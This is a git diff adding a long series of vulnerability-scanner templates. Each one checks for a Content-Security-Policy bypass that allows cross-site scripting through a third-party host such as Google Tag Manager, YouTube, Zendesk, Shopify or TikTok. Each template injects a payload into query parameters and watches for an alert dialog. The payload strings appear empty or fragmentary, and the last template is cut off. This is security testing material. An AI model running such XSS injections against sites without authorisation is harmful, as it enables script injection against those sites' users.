+1,55 @@ +id: securepubads-doubleclick-csp-xss + +info: + name: Content-Security-Policy Bypass via Secure DoubleClick PubAds + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,doubleclick + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: securepubads_doubleclick_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "securepubads_doubleclick_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/segapi-quantserve-csp-xss.yaml b/dast/vulnerabilities/xss/csp/segapi-quantserve-csp-xss.yaml new file mode 100644 index 00000000000..8b0b3c98ce3 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/segapi-quantserve-csp-xss.yaml @@ -0,0 +1,55 @@ +id: segapi-quantserve-csp-xss + +info: + name: Content-Security-Policy Bypass via SegAPI Quantserve + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,quantserve + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: segapi_quantserve_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "segapi_quantserve_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/server-ethicalads-csp-xss.yaml b/dast/vulnerabilities/xss/csp/server-ethicalads-csp-xss.yaml new file mode 100644 index 00000000000..c2e769b64b1 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/server-ethicalads-csp-xss.yaml @@ -0,0 +1,55 @@ +id: server-ethicalads-csp-xss + +info: + name: Content-Security-Policy Bypass via EthicalAds Server + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,ethicalads + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: server_ethicalads_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "server_ethicalads_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/shop-samsung-csp-xss.yaml b/dast/vulnerabilities/xss/csp/shop-samsung-csp-xss.yaml new file mode 100644 index 00000000000..eb8c6ae1ad1 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/shop-samsung-csp-xss.yaml @@ -0,0 +1,55 @@ +id: shop-samsung-csp-xss + +info: + name: Content-Security-Policy Bypass via Samsung Shop + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,samsung + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: shop_samsung_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "shop_samsung_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/skype-config-csp-xss.yaml b/dast/vulnerabilities/xss/csp/skype-config-csp-xss.yaml new file mode 100644 index 00000000000..008ab5fb3d5 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/skype-config-csp-xss.yaml @@ -0,0 +1,57 @@ +id: skype-config-csp-xss + +info: + name: Content-Security-Policy Bypass via Skype Config + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,skype + +#flow: http() && headless() + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: skype_config_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "skype_config_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/smartcaptcha-yandexcloud-csp-xss.yaml b/dast/vulnerabilities/xss/csp/smartcaptcha-yandexcloud-csp-xss.yaml new file mode 100644 index 00000000000..b8d7e8efb06 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/smartcaptcha-yandexcloud-csp-xss.yaml @@ -0,0 +1,55 @@ +id: smartcaptcha-yandexcloud-csp-xss + +info: + name: Content-Security-Policy Bypass via YandexCloud SmartCaptcha + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,yandexcloud + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: smartcaptcha_yandexcloud_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "smartcaptcha_yandexcloud_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/social-yandex-csp-xss.yaml b/dast/vulnerabilities/xss/csp/social-yandex-csp-xss.yaml new file mode 100644 index 00000000000..5dcfe7ac37c --- /dev/null +++ b/dast/vulnerabilities/xss/csp/social-yandex-csp-xss.yaml @@ -0,0 +1,55 @@ +id: social-yandex-csp-xss + +info: + name: Content-Security-Policy Bypass via Yandex Social + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,yandex + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: social_yandex_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "social_yandex_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/soundcloud-csp-xss.yaml b/dast/vulnerabilities/xss/csp/soundcloud-csp-xss.yaml new file mode 100644 index 00000000000..1ccebf63711 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/soundcloud-csp-xss.yaml @@ -0,0 +1,55 @@ +id: soundcloud-csp-xss + +info: + name: Content-Security-Policy Bypass via SoundCloud + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,soundcloud + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: soundcloud_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "soundcloud_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/srv-carbonads-csp-xss.yaml b/dast/vulnerabilities/xss/csp/srv-carbonads-csp-xss.yaml new file mode 100644 index 00000000000..2a16a5ae548 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/srv-carbonads-csp-xss.yaml @@ -0,0 +1,55 @@ +id: srv-carbonads-csp-xss + +info: + name: Content-Security-Policy Bypass via CarbonAds + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,carbonads + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: srv_carbonads_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "srv_carbonads_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/ssl-gstatic-csp-xss.yaml b/dast/vulnerabilities/xss/csp/ssl-gstatic-csp-xss.yaml new file mode 100644 index 00000000000..89cb1f2fb01 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/ssl-gstatic-csp-xss.yaml @@ -0,0 +1,55 @@ +id: ssl-gstatic-csp-xss + +info: + name: Content-Security-Policy Bypass via Gstatic SSL + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,gstatic + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: ssl_gstatic_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "ssl_gstatic_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/sso-bytedance-csp-xss.yaml b/dast/vulnerabilities/xss/csp/sso-bytedance-csp-xss.yaml new file mode 100644 index 00000000000..4f9cc6338c9 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/sso-bytedance-csp-xss.yaml @@ -0,0 +1,55 @@ +id: sso-bytedance-csp-xss + +info: + name: Content-Security-Policy Bypass via ByteDance SSO + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,bytedance + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: sso_bytedance_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "sso_bytedance_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/st3-zoom-csp-xss.yaml b/dast/vulnerabilities/xss/csp/st3-zoom-csp-xss.yaml new file mode 100644 index 00000000000..444ee9ab8d5 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/st3-zoom-csp-xss.yaml @@ -0,0 +1,55 @@ +id: st3-zoom-csp-xss + +info: + name: Content-Security-Policy Bypass via Zoom ST3 + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,zoom + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '
' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: st3_zoom_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "st3_zoom_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/stackexchange-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/stackexchange-api-csp-xss.yaml new file mode 100644 index 00000000000..805ef3c0e34 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/stackexchange-api-csp-xss.yaml @@ -0,0 +1,55 @@ +id: stackexchange-api-csp-xss + +info: + name: Content-Security-Policy Bypass via StackExchange API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,stackexchange + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: stackexchange_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "stackexchange_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/static-parastorage-csp-xss.yaml b/dast/vulnerabilities/xss/csp/static-parastorage-csp-xss.yaml new file mode 100644 index 00000000000..8a0729fae8d --- /dev/null +++ b/dast/vulnerabilities/xss/csp/static-parastorage-csp-xss.yaml @@ -0,0 +1,55 @@ +id: static-parastorage-csp-xss + +info: + name: Content-Security-Policy Bypass via Parastorage Static + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,parastorage + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: static_parastorage_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "static_parastorage_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/storage-googleapis-csp-xss.yaml b/dast/vulnerabilities/xss/csp/storage-googleapis-csp-xss.yaml new file mode 100644 index 00000000000..7f9571d8376 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/storage-googleapis-csp-xss.yaml @@ -0,0 +1,55 @@ +id: storage-googleapis-csp-xss + +info: + name: Content-Security-Policy Bypass via Google Storage + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,google + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: storage_googleapis_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "storage_googleapis_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/storemapper-herokuapp-fastly-csp-xss.yaml b/dast/vulnerabilities/xss/csp/storemapper-herokuapp-fastly-csp-xss.yaml new file mode 100644 index 00000000000..32994ba3d9c --- /dev/null +++ b/dast/vulnerabilities/xss/csp/storemapper-herokuapp-fastly-csp-xss.yaml @@ -0,0 +1,55 @@ +id: storemapper-herokuapp-fastly-csp-xss + +info: + name: Content-Security-Policy Bypass via Storemapper Herokuapp Fastly + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,storemapper + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: storemapper_herokuapp_fastly_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "storemapper_herokuapp_fastly_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/suggest-taobao-csp-xss.yaml b/dast/vulnerabilities/xss/csp/suggest-taobao-csp-xss.yaml new file mode 100644 index 00000000000..cf1e7e98928 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/suggest-taobao-csp-xss.yaml @@ -0,0 +1,55 @@ +id: suggest-taobao-csp-xss + +info: + name: Content-Security-Policy Bypass via Taobao Suggest + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,taobao + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: suggest_taobao_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "suggest_taobao_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/suggestqueries-youtube-csp-xss.yaml b/dast/vulnerabilities/xss/csp/suggestqueries-youtube-csp-xss.yaml new file mode 100644 index 00000000000..fa2828d7c4e --- /dev/null +++ b/dast/vulnerabilities/xss/csp/suggestqueries-youtube-csp-xss.yaml @@ -0,0 +1,55 @@ +id: suggestqueries-youtube-csp-xss + +info: + name: Content-Security-Policy Bypass via YouTube SuggestQueries + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,youtube + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: suggestqueries_youtube_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "suggestqueries_youtube_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/support-zendesk-csp-xss.yaml b/dast/vulnerabilities/xss/csp/support-zendesk-csp-xss.yaml new file mode 100644 index 00000000000..6e2c9946b9a --- /dev/null +++ b/dast/vulnerabilities/xss/csp/support-zendesk-csp-xss.yaml @@ -0,0 +1,55 @@ +id: support-zendesk-csp-xss + +info: + name: Content-Security-Policy Bypass via Zendesk Support + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,zendesk + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: support_zendesk_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "support_zendesk_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/swiftype-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/swiftype-api-csp-xss.yaml new file mode 100644 index 00000000000..85452b5d1d9 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/swiftype-api-csp-xss.yaml @@ -0,0 +1,55 @@ +id: swiftype-api-csp-xss + +info: + name: Content-Security-Policy Bypass via Swiftype API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,swiftype + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: swiftype_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "swiftype_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/sync-im-apps-csp-xss.yaml b/dast/vulnerabilities/xss/csp/sync-im-apps-csp-xss.yaml new file mode 100644 index 00000000000..9d3615ae106 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/sync-im-apps-csp-xss.yaml @@ -0,0 +1,55 @@ +id: sync-im-apps-csp-xss + +info: + name: Content-Security-Policy Bypass via IM Apps Sync + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,im-apps + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: sync_im_apps_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "sync_im_apps_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/tagmanager-google-csp-xss.yaml b/dast/vulnerabilities/xss/csp/tagmanager-google-csp-xss.yaml new file mode 100644 index 00000000000..60413f9387e --- /dev/null +++ b/dast/vulnerabilities/xss/csp/tagmanager-google-csp-xss.yaml @@ -0,0 +1,55 @@ +id: tagmanager-google-csp-xss + +info: + name: Content-Security-Policy Bypass via Google Tag Manager + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,google + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: tagmanager_google_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "tagmanager_google_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/tcr9i-openai-csp-xss.yaml b/dast/vulnerabilities/xss/csp/tcr9i-openai-csp-xss.yaml new file mode 100644 index 00000000000..1cd217b9730 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/tcr9i-openai-csp-xss.yaml @@ -0,0 +1,55 @@ +id: tcr9i-openai-csp-xss + +info: + name: Content-Security-Policy Bypass via OpenAI TCR9I + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,openai + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: tcr9i_openai_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "tcr9i_openai_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/thehive-shopify-csp-xss.yaml b/dast/vulnerabilities/xss/csp/thehive-shopify-csp-xss.yaml new file mode 100644 index 00000000000..7b8db0afe94 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/thehive-shopify-csp-xss.yaml @@ -0,0 +1,55 @@ +id: thehive-shopify-csp-xss + +info: + name: Content-Security-Policy Bypass via Shopify TheHive + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,shopify + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '
' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: thehive_shopify_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "thehive_shopify_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/thiscanbeanything-zendesk-csp-xss.yaml b/dast/vulnerabilities/xss/csp/thiscanbeanything-zendesk-csp-xss.yaml new file mode 100644 index 00000000000..41371386464 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/thiscanbeanything-zendesk-csp-xss.yaml @@ -0,0 +1,55 @@ +id: thiscanbeanything-zendesk-csp-xss + +info: + name: Content-Security-Policy Bypass via Zendesk ThisCanBeAnything + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,zendesk + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: thiscanbeanything_zendesk_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "thiscanbeanything_zendesk_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/tiktok-analytics-csp-xss.yaml b/dast/vulnerabilities/xss/csp/tiktok-analytics-csp-xss.yaml new file mode 100644 index 00000000000..762cd7ef3e9 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/tiktok-analytics-csp-xss.yaml @@ -0,0 +1,55 @@ +id: tiktok-analytics-csp-xss + +info: + name: Content-Security-Policy Bypass via TikTok Analytics + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,tiktok + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: tiktok_analytics_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - 